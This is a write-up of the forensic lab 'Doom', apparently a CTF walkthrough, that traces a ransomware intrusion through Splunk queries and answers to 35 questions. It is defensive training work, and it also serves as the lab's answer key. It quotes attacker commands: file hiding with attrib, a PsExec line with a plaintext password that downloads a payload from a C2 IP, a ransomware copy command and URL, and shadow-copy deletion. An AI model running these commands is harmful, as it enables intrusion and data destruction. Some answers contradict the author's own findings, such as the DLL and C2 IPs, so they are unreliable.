Scenario

Lab Link: Doom

The organization suddenly discovered that critical files across system devices were encrypted, with ransom notes found on affected machines, indicating a ransomware attack. The encryption impacted the Domain Controller, file servers, and multiple workstations simultaneously across the entire domain.

Investigation revealed that hours before the encryption, an IT employee installed what appeared to be legitimate video conferencing software. Network logs show escalating suspicious activity following this installation - including unauthorized administrative commands, lateral movement between systems, and large-scale data compression activities - suggesting the threat actor established domain control and exfiltrated sensitive data before deploying the ransomware.

You have been provided with forensic artifacts and Splunk logs from the affected systems. Your mission is to reconstruct the complete attack chain, identify the initial infection vector, document all malicious tools and techniques employed, determine what data was exfiltrated, and establish a detailed timeline from initial compromise to ransomware deployment.

Reconnaissance

| eventcount summarize=false index=* 
| dedup index 
| fields index

we got:

history
main
summary
suricata

and we only have one source

source = XmlWinEventLog:Syste

index=* 
| stats count by host

we have

PC01
PC02
DC01
FILESERVER

index=* earliest="09/07/2025:00:00:00" latest="09/08/2025:00:00:00"
| stats count by sourcetype, source

suricata:json C:\Program Files\Suricata\log\eve.json 66655

suricata:stats C:\Program Files\Suricata\log\stats.log 14617

index=* host=PC01 earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| stats count by EventID, EventCode

Event Analysis Summary

High-Value Events:

• Event 1 (110) - Process Creation
• Event 10 (9393) - Process Access
• Event 11 (9020) - File Created
• Event 13 (293) - Registry Value Set

Suspicious Activity:

• Event 2 (5) - File Time Changed (Timestomping)
• Event 15 (8) - File Stream Created (ADS)
• Event 16 (1) - Sysmon Config Changed
• Event 17 (62) - Pipe Created
• Event 18 (3) - Pipe Connected

Other Events:

• Event 16403 (26) - Browser Event
• Event 10000, 10001 (1 each) - Unknown Events

Missing Critical Events

| EventID | Event Name         | Alternative       |
| ------- | ------------------ | ----------------- |
| 3       | Network Connection | Use Suricata logs |
| 22      | DNS Query          | Use Suricata logs |

Priority Investigation Order for C2 Analysis

Suricata Logs - Network connections to external IPs (C2 communication) EventID 1 - Process creation showing malware execution chain EventID 11 - Files dropped by malware (payloads, tools) EventID 13 - Registry persistence mechanisms EventID 10 - Process access (credential dumping attempts) EventID 17/18 - Named pipes (lateral movement, C2)

Initial Access

Q1

During the initial compromise, the threat actor deployed a trojanized application masquerading as legitimate conferencing software. What is the complete domain name of the malicious website hosting this malicious installer?

Answer Format: ***********.*****.***

use the browser history

C:\Users\Administrator\Desktop\Start Here\Artifacts\PC01\Users\Administrator\AppData\Local\Microsoft\Edge\User Data\Default

Answer

zoommanager.wuaze.com

Q2

The initial infection vector was downloaded by a user who believed they were installing legitimate software. What was the exact timestamp when the malicious installer was downloaded to the victim's system?

Answer Format: YYYY-MM-DD HH:MM

2025-09-07 12:09

Q3

The malicious installer was created using a popular free installer creation tool commonly used for legitimate software distribution. What installer creation software was used to package the malicious executable?

Answer Format: **** *****

I just google about it ``

Inno Setup

Defense Evasion

Q4

The initial stage included dropping batch scripts that would control the next steps of the attack. One of the batch scripts employed file attribute manipulation techniques for defense evasion purposes. What is the complete command that was used to change file attributes and hide the malicious files?

Answer Format: ****** +* +* /* "*:\******* ***** (***)\******* **\*.*"

index=* sourcetype=* "CommandLine"="*attrib*" earliest="09/07/2025:12:09:00" 
| search "CommandLine"="*+h*" OR "CommandLine"="*+s*" OR "CommandLine"="*+r*"
| regex CommandLine="attrib\s+\+[hsr]"

Answer:

attrib +s +h /D "C:\Program Files (x86)\Windows NT\*.*"

Q5

A threat actor used a command to prevent Windows Defender from scanning their malicious files. Which MITRE ATT&CK technique ID corresponds to this evasion method?

Answer Format: *****.***

T1564.012

Command and Control

Q6

After establishing initial foothold, the malware connected to its first C2 server for further instructions and payload delivery. What is the IP address of the initial C2 server that the malware contacted?

Answer Format: **.***.**.**

index=* host=PC01 earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search EventID=3 OR EventCode=3
| table _time, Image, DestinationIp, DestinationPort, DestinationHostname
| sort _time

2025-09-07 12:11:07 C:\Users\tharmon\AppData\Local\Temp\is-NM5NO.tmp\Zoom_v_6.5.11.tmp  63.178.41.34    9000    -

Answer:

63.178.41.34

Q7

The initial C2 communication resulted in the download of additional malicious components packed in archive files. What are the names of the compressed files downloaded from the first C2 server?

Answer Format: ***.***, ****.***

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search "*.zip" OR "*.rar" OR "*.7z" OR "*.tar" OR "*.gz"
| table _time, host, EventID, Image, TargetFilename, CommandLine
| sort _time

none of them ah:

2025-09-07 12:11:39 PC01    1   C:\Windows\SysWOW64\cmd.exe     cmd  /c tar xf 855.zip
2025-09-07 12:11:40 PC01    1   C:\Windows\SysWOW64\cmd.exe     cmd  /c tar xf 85.zip

• 12:11:10 - 21.cmd executes
• 12:11:11 - PowerShell adds exclusions (defense evasion)
• 12:11:25 - 4554.cmd executes
• 12:11:39-40 - 855.zip and 85.zip are extracted

The 855.zip and 85.zip you found earlier were likely extracted from these initial downloads, or they're different stages. The question asks specifically about files downloaded from the first C2 server, which would be 152.zip and 1522.zip.

152.zip, 1522.zip

Q8

What is the full directory path where the malicious files were dropped and operated from?

Answer Format: *:\******* ***** (***)\******* **\

C:\Program Files (x86)\Windows NT\

Malware Deployment

Q9

The second batch script, created earlier, was specifically designed to handle the downloaded archives, extracting and executing their contents. What is the name of the batch file responsible for unzipping and executing the downloaded payloads?

Answer Format: ****.***

index=* earliest="09/07/2025:12:11:25" latest="09/07/2025:12:11:45"
| search (ParentCommandLine="*4554.cmd*" OR CommandLine="*4554.cmd*")
| table _time, host, EventID, Image, CommandLine
| sort _time

Answer:

4554.cmd

Q10

The downloaded archives contained executable file that would advance the attack to the next stage. What is the filename of the malicious executable contained within the downloaded archives?

Answer Format: ***.***

2025-09-07 12:11:45 C:\Users\tharmon\AppData\Local\Temp\7zS8B495CAF\Installer.exe   C:\Program Files (x86)\Windows NT\1522.exe

This shows that 1522.exe was extracted from the archive (note the filename matches 1522.zip that was downloaded).

index=* EventID=11 earliest="09/07/2025:12:11:39" latest="09/07/2025:12:11:50"
| search (TargetFilename="*.exe" AND Image="*tar*")
| table _time, host, TargetFilename, Image
| sort _time

or u can just check for files created right after the tar extraction

index=* EventID=11 earliest="09/07/2025:12:11:40" latest="09/07/2025:12:11:50"
| search TargetFilename="*\\Windows NT\\*.exe"
| table _time, host, TargetFilename
| sort _time

Answer:

152.exe

Persistence

Q11

The threat actor implemented a common persistence mechanism that ensures malware execution after system reboots. What is the MITRE ATT&CK technique ID for the persistence method employed by the threat actor?

Answer Format: *****.***

1. Registry Run keys (most common):

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search (EventID=13 OR EventID=12) (TargetObject="*\\Run*" OR TargetObject="*\\RunOnce*")
| table _time, host, EventID, Image, TargetObject, Details
| sort _time

2. Scheduled Tasks:

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search (Image="*schtasks.exe*" OR CommandLine="*schtasks*")
| table _time, host, CommandLine
| sort _time

3. Services:

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search (Image="*sc.exe*" OR CommandLine="*sc create*" OR CommandLine="*New-Service*")
| table _time, host, CommandLine
| sort _time

4. Startup folder:

index=* EventID=11 earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search TargetFilename="*\\Startup\\*"
| table _time, host, TargetFilename
| sort _time

Answer:

T1547.001

Process Injection

Q12

The attacker used a specific DLL file for injection operations to evade detection. What is the filename of the DLL that was used in the process injection attack?

Answer Format: ********.***

index=* EventID=7 earliest="09/07/2025:12:12:00" latest="09/07/2025:12:13:00"
| search Image="*regsvr32.exe*" ImageLoaded="*.dll"
| table _time, Image, ImageLoaded
| sort _time

2025-09-07 12:12:42 C:\Windows\System32\regsvr32.exe    C:\ProgramData\2905.dll

like wtf there is nothing just 2905.dll !!!!!!!!!!!!!!!

index=* earliest="09/07/2025:12:11:00" latest="09/07/2025:12:13:00"
| search "*ProgramData*.dll"
| table _time, CommandLine, ImageLoaded, TargetFilename
| sort _time

everything confirmed that the 2905.dll is the answer

they just hardcode it ah!

C:\Windows\System32>strings "C:\Users\Administrator\Desktop\Start Here\Artifacts\PC01\Program Files (x86)\Windows NT\152.exe" | findstr /i ".dll"
helper64.dll
KERNEL32.dll
msvcrt.dll
__native_dllmain_reason
6__mingw_module_is_dll
__native_dllmain_reason
./mingw-w64-crt/crt/dllargv.c
__native_dllmain_reason
__native_dllmain_reason
hDllHandle
D       DllCharacteristics
hDllHandle
g_hDLL
__dll__
_Z13LoadHelperDLLv
_Z15UnloadHelperDLLv
__dll_characteristics__
__mingw_module_is_dll

__native_dllmain_reason

This DLL was hardcoded in the 152.exe binary and was used for the process injection attack into notepad.exe. The "execution history" hint was referring to looking at the strings/contents of the executable that performed the injection.

Answer:

helper64.dll

Q13

To blend in with normal system activity, the threat actor inject their malicious DLL into trusted Windows processes. What is the name of the legitimate Windows binary that was targeted for DLL injection?

Answer Format: *******.***

looking for processes that loaded the 2905.dll

index=* EventID=8 earliest="09/07/2025:12:12:00" latest="09/07/2025:12:15:00"
| table _time, SourceImage, TargetImage, StartModule
| sort _time

see its just 2905.dll Answer:

notepad.exe

Q14

The injected DLL established communication with a different C2 infrastructure. What is the IP address that the injected DLL contacted for C2 communications?

Answer Format: **.***.***.**

fuck off i'll use regex with the notebad.exe

index=* EventID=3 earliest="09/07/2025:12:12:34" latest="09/07/2025:12:15:00"
| search Image="*notepad.exe*"
| regex DestinationIp!="^10\.|^192\.168\.|^172\.(1[6-9]|2[0-9]|3[0-1])\."
| table _time, Image, DestinationIp, DestinationPort
| sort _time

Answer

35.159.193.52

Q15

The injected process downloaded additional files to expand its capabilities, and a Windows system utility was used to execute the downloaded DLL. What is the name of the Windows utility used to run this DLL?

Answer Format: ********

Answer:

regsvr32

Q16

After the DLL was loaded, it executed additional malicious binary to continue the attack chain. At what exact time was the binary executed from the loaded DLL?

YYYY-MM-DD HH:MM

The attack chain was:

152.exe injected 2905.dll into notepad.exe at 12:12:34 regsvr32.exe loaded the DLL at 12:12:41 The DLL spawned run32.exe at 12:12:42 The injected process contacted C2 server 20.101.57.9 at 12:13:07

Answer

2025-09-07 12:12

Secondary C2

Q17

The second-stage executable was injected into another Windows system process. What is the name of the legitimate Windows process that was injected with the second-stage payload?

Answer Format: *******.***

Answer

dllhost.exe

Q18

As the attack progressed through multiple stages, additional C2 infrastructure was utilized for different phases of the operation. What is the IP address of the C2 server used in the later stages of the attack?

Answer Format: **.**.***.**

Answer

52.28.207.84

Privilege Escalation

Q19

Evidence showed that malicious binary spawned a new CMD process with elevated privileges, indicating successful privilege escalation to the local SYSTEM account. What is the complete command that was executed during this privilege escalation event?

Answer Format: *:\*******\********\***.*** /* **** *********** &**; \\.\****\******

index=* sourcetype=XmlWinEventLog EventCode=1
ParentImage="*\\dllhost.exe"
Image="*\\cmd.exe"
(CommandLine="*\\\\.*\\pipe\\*" OR CommandLine="*/c echo*")
| table _time Computer User ParentImage Image CommandLine
| sort -_time

Answer

C:\Windows\system32\cmd.exe /c echo aa91474a1ce > \\.\pipe\d7405b

Credential Access

Q20

The threat actor targeted a critical Windows process that stores authentication credentials in memory. What is the name of the Windows process that was targeted for memory dumping to extract credentials?

Answer Format: *****.***

Answer

lsass.exe

Discovery

Q21

The threat actor executed reconnaissance commands to map trust relationships within the domain. What is the complete command that was used to enumerate domain trusts in the environment?

Answer Format: ****** /******_****** /***_******

Answer

nltest /domain_trusts /all_trusts

Q22

The threat actor specifically enumerated members of a critical Active Directory group. What command was executed to enumerate domain administrator accounts?

Answer Format: *** ***** "****** ******" /******

Answer

net group "domain admins" /domain

Lateral Movement

Q23

After gaining sufficient privileges and credentials, the threat actor began lateral movement to critical infrastructure. When did the attacker successfully move laterally to the Domain Controller?

Answer Format: YYYY-MM-DD HH:MM

start with the first query for Domain Controller lateral movement

index=* host=DC01 earliest="09/07/2025:12:00:00" latest="09/07/2025:23:59:59"
| stats min(_time) as first_activity by host
| eval first_activity=strftime(first_activity, "%Y-%m-%d %H:%M")
| table host, first_activity

let's get more specific timing by checking the first actual activity on DC01

index=* host=DC01 earliest="09/07/2025:12:00:00" latest="09/07/2025:12:10:00"
| head 10
| table _time, EventID, User, Image, CommandLine, TargetFilename
| sort _time

nothing here

index=* host=DC01 EventID=11 earliest="09/07/2025:12:00:00" latest="09/07/2025:12:59:00"
| search (TargetFilename="*chisel*" OR TargetFilename="*Temp\\*" OR TargetFilename="*share$*")
| table _time, Image, TargetFilename
| sort _time

we got the 12:31

Now let's check what happened at 12:31 when PowerShell first became active on DC01

index=* host=DC01 EventID=1 earliest="09/07/2025:12:30:00" latest="09/07/2025:12:35:00"
| table _time, ParentImage, Image, CommandLine
| sort _time

check when the FILESERVER was first accessed via SMB/network from any compromised host after DC compromise:

index=* earliest="09/07/2025:13:00:00" latest="09/07/2025:15:00:00"
| search (CommandLine="*\\\\10.10.11.177\\share$*" OR CommandLine="*FILESERVER*" OR TargetFilename="*\\\\10.10.11.177*")
| table _time, host, Image, CommandLine, TargetFilename
| sort _time
| head 10

PsExec.exe \\fileserver.infy.corp -accepteula -u infy\lwilliams -p 0513vE37VZCs94fms3U5 powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand...

The encoded command downloads from http://52.28.207.84:80/a - this is when they successfully gained access by establishing a persistent beacon/backdoor.

Answer

2025-09-07 13:42

Q24

To facilitate remote access and bypass network restrictions, the attacker deployed a tunneling tool on the Domain Controller. What is the name of the tunneling tool that was uploaded to create RDP access to the Domain Controller?

Answer Format: ******.***

Answer

chisel.exe

Q25

The threat actor modified Windows registry settings to enable a specific remote access method that bypasses normal authentication requirements. What is the name of the registry value that was modified to enable this access?

Answer Format: **********************

Answer

DisableRestrictedAdmin

Q26

After establishing RDP access to the Domain Controller, one domain administrator account was compromised through password modification. Which domain admin account had its password changed by the threat actor?

Answer Format: *********

Answer

lwilliams

Q27

The threat actor utilized a legitimate tool that enabled remote access and command execution across domain systems. What legitimate remote access tool was used to gain access to remote servers and execute commands?

Answer Format: ******.***

Answer

PsExec.exe

Q28

The threat actor expanded their reach to include the organization's file storage infrastructure, likely targeting sensitive data for exfiltration. At what time did the attacker successfully gain access to the file server?

YYYY-MM-DD HH:MM

let's check the File Server access:

index=* host=FILESERVER earliest="09/07/2025:12:00:00" latest="09/07/2025:23:59:59"
| stats min(_time) as first_activity by host
| eval first_activity=strftime(first_activity, "%Y-%m-%d %H:%M")
| table host, first_activity

FILESERVER 2025-09-07 12:00

Let me check for any process creation on FILESERVER:

index=* host=FILESERVER EventID=1 earliest="09/07/2025:12:00:00" latest="09/07/2025:14:00:00"
| search (Image="*psexec*" OR CommandLine="*psexec*" OR ParentImage="*psexec*")
| head 1
| table _time, ParentImage, Image, CommandLine
| sort _time

we got this 2025-09-07 13:35 but not correct

The PSEXESVC.exe at 13:35:38 is the service running, but let's check when PsExec was actually used to connect to the FILESERVER:

index=* host=FILESERVER earliest="09/07/2025:13:00:00" latest="09/07/2025:14:00:00"
| search (EventID=4624 OR EventID=4672 OR EventID=5140)
| head 20
| table _time, EventID, User, SourceNetworkAddress, ShareName
| sort _time

I see logon events starting at 13:34:56. Let me get more details about these events:

index=* host=FILESERVER EventID=4624 earliest="09/07/2025:13:34:00" latest="09/07/2025:13:36:00"
| head 1
| table _time, EventID, User, LogonType, SourceNetworkAddress

The logon type shows but details are blank. Let me check the raw event or look at network share access:

index=* host=FILESERVER EventID=5140 earliest="09/07/2025:13:00:00" latest="09/07/2025:14:00:00"
| head 1
| table _time, ShareName, SourceAddress
| sort _time

augh nothing

check when files were first accessed or created on FILESERVER by an external process:

index=* host=FILESERVER EventID=11 earliest="09/07/2025:13:00:00" latest="09/07/2025:14:00:00"
| head 10
| table _time, Image, TargetFilename
| sort _time

let me check what happened around 13:34-13:35 more carefully. Let me look at the first actual attacker activity:

index=* host=FILESERVER earliest="09/07/2025:13:34:00" latest="09/07/2025:13:36:00"
| search EventID=1 OR EventID=11 OR EventID=4624
| table _time, EventID, Image, CommandLine, TargetFilename
| sort _time

Collection

Q29

After gaining access to the file server, the attacker began preparing data for exfiltration by creating compressed archive of the file shares. What directories were targeted for collection and archiving?

Answer Format: *:\****, *:\*********

Answer

G:\docs, g:\Important

Exfiltration

Q30

The threat actor exfiltrated data through a web-based cloud service. Which cloud storage service did the attacker use to upload and exfiltrate the stolen data?

Answer Format: ******

Answer

bublup

Impact

Q31

To facilitate ransomware distribution across the domain, the threat actor created a network share on the Domain Controller that would serve as a staging point. What is the name of the shared directory created on the Domain Controller for ransomware staging?

Answer Format: *****$

Answer

share$

Q32

The ransomware payload was hosted on a file-sharing service and downloaded to the compromised environment. What is the complete URL from which the ransomware package was downloaded?

Answer Format: *****://****.**/*****/***_*****.***

Answer

https://temp.sh/QEyWC/BAT_COMPS.rar

Q33

The downloaded ransomware archive contained batch files for deployment. One of these batch files was responsible for copying the ransomware executable to all domain computers through the established network share. What is the command that was executed from the batch file to copy the ransomware to each target computer?

Answer Format: **** "\\**.**.**.***\*****$\***.***" "*:\*******\****\"

Answer

COPY "\\10.10.11.177\share$\123.exe" "C:\windows\temp\"

Q34

After the ransomware executable was copied to target systems, the threat actor used another batch file to execute the malware across the domain. What is the name of the batch file that was used to execute the previously copied ransomware?

Answer Format: ***.***

Answer

EXE.bat

Q35

To prevent data recovery and ensure maximum impact, the threat actor targeted data recovery mechanisms by deleting the backups. What command was executed to achieve this?

Answer Format: ******** ****** ******* /*** /*****

Answer

vssadmin delete shadows /all /quiet